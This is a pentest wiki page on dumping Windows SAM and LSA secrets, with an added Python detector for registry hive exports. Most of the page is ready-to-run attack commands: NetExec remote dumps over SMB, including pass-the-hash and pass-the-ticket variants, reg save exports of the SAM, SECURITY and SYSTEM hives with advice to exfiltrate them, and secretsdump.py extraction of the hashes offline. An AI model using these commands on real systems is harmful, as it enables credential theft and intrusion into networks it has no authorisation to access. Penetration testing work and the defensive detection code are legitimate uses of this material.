Pentest List Wiki

SAM & LSA secrets

How to find local user passwords, hashes and secrets.


Last updated 11 months ago

Overview

Windows passwords are hashed and stored in the SAM and SECURITY registry hives.

A breakdown of the important hives is shown below:

SAM

Stores locally cached credentials in LM or NT hash format.

SECURITY

Stores the LSA secrets, which may be held in plaintext or as LM or NT hashes, Kerberos keys (DES, AES), domain cached credentials (DCC1 and DCC2), as well as security questions (L$SQSA).

SYSTEM

This hive is exported alongside the other two because it is needed to decrypt the SAM secrets and LSA secrets; without it the exported hives cannot be read offline.

Remotely Dumping

The SAM and LSA secrets can be dumped remotely by exporting the registry hives over the network and then running a credential extraction tool on them. NetExec is a network execution tool that performs a range of remote tasks, including dumping the SAM and LSA secrets over SMB.

NetExec can authenticate to a remote Windows host with several types of credentials. Local administrator privileges on the target are required in every case. In the commands below, choose --sam or --lsa depending on which set of secrets you want to dump:

Remote SAM/LSA secrets dump using domain user with local administrator privileges

netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using local user with local administrator privileges

netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user

netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>

Remote SAM/LSA secrets dump using pass-the-ticket attack with local administrator user

netexec smb <Windows_IP> --kerberos <--sam/--lsa>

Local Dumping

The Dump

The SAM and LSA secrets can be dumped locally by exporting the registry hives on the host and then running an offline credential extraction tool against the exported files. The easiest way to export the hives is an administrative cmd prompt with the following commands:

reg save HKLM\SAM "C:\Windows\Temp\sam"

reg save HKLM\SECURITY "C:\Windows\Temp\security"

reg save HKLM\SYSTEM "C:\Windows\Temp\system"

These files can then be exfiltrated out of the Windows machine and onto your attack machine.
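As an added defensive example (not part of this wiki), the following Python flags process-creation telemetry for the reg save commands shown above and groups the exported hives per user, because an export of SYSTEM together with SAM or SECURITY is what makes offline decryption possible. The event shape (dicts with EventID, User and CommandLine) and the sample events are constructed assumptions, not real telemetry.

```python
"""Flag process-creation events whose command line exports the SAM, SECURITY or
SYSTEM hive with reg.exe, i.e. the local dump technique shown above."""
import re
from typing import Dict, Iterable, List, Optional, Set

# Matches 'reg save HKLM\SAM ...' or '"C:\...\reg.exe" save HKEY_LOCAL_MACHINE\SECURITY ...'
# in any casing; the hive name is captured so findings can be grouped per user.
_REG_SAVE = re.compile(
    r"""(?:^|[\\/\s"'])reg(?:\.exe)?["']?\s+save\s+["']?"""
    r"""(?:HKLM|HKEY_LOCAL_MACHINE)\\(SAM|SECURITY|SYSTEM)(?=["'\s\\]|$)""",
    re.IGNORECASE)

def hive_saved(command_line: str) -> Optional[str]:
    """Return the exported hive name in upper case, or None if the line is benign."""
    m = _REG_SAVE.search(command_line)
    return m.group(1).upper() if m else None

def detect_hive_dumps(events: Iterable[Dict]) -> List[Dict]:
    """One finding per sensitive hive export in Sysmon EID 1 / Security 4688 events."""
    findings = []
    for ev in events:  # events modelled as dicts with EventID, User, CommandLine
        if ev.get("EventID") in (1, 4688):
            hive = hive_saved(ev.get("CommandLine", ""))
            if hive:
                findings.append({"user": ev.get("User"), "hive": hive,
                                 "command_line": ev["CommandLine"]})
    return findings

def hives_by_user(findings: List[Dict]) -> Dict[str, Set[str]]:
    """Group exported hives per user so a complete dump stands out from a stray export."""
    grouped: Dict[str, Set[str]] = {}
    for f in findings:
        grouped.setdefault(f["user"], set()).add(f["hive"])
    return grouped

def decryptable(hives: Set[str]) -> bool:
    """True when SYSTEM (which holds the key) and SAM or SECURITY were both exported."""
    return "SYSTEM" in hives and bool(hives & {"SAM", "SECURITY"})

# Constructed sample events, not captured from a real host.
SAMPLE_EVENTS = [
    {"EventID": 1, "User": "LAB\\admin",
     "CommandLine": r'reg save HKLM\SAM "C:\Windows\Temp\sam"'},
    {"EventID": 1, "User": "LAB\\admin",
     "CommandLine": r'"C:\Windows\System32\reg.exe" save HKEY_LOCAL_MACHINE\SECURITY C:\Windows\Temp\security'},
    {"EventID": 4688, "User": "LAB\\admin",
     "CommandLine": r'reg.exe save hklm\system C:\Windows\Temp\system /y'},
    {"EventID": 1, "User": "LAB\\dev",
     "CommandLine": r'reg save HKLM\SOFTWARE\Contoso C:\backup\contoso.hiv'},
]
```

Running detect_hive_dumps over SAMPLE_EVENTS yields SAM, SECURITY and SYSTEM for LAB\admin (a decryptable set) and nothing for the unrelated SOFTWARE export.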

Credential Extraction

secretsdump.py, from the Impacket suite, implements several techniques for dumping password hashes and secrets, including parsing exported registry hives offline.

Run the command below on your attack machine, pointing it at the three registry files exported with the local dump technique above:

secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL

NetExec: https://github.com/Pennyw0rth/NetExec
secretsdump.py (Impacket): https://github.com/fortra/impacket/blob/master/examples/secretsdump.py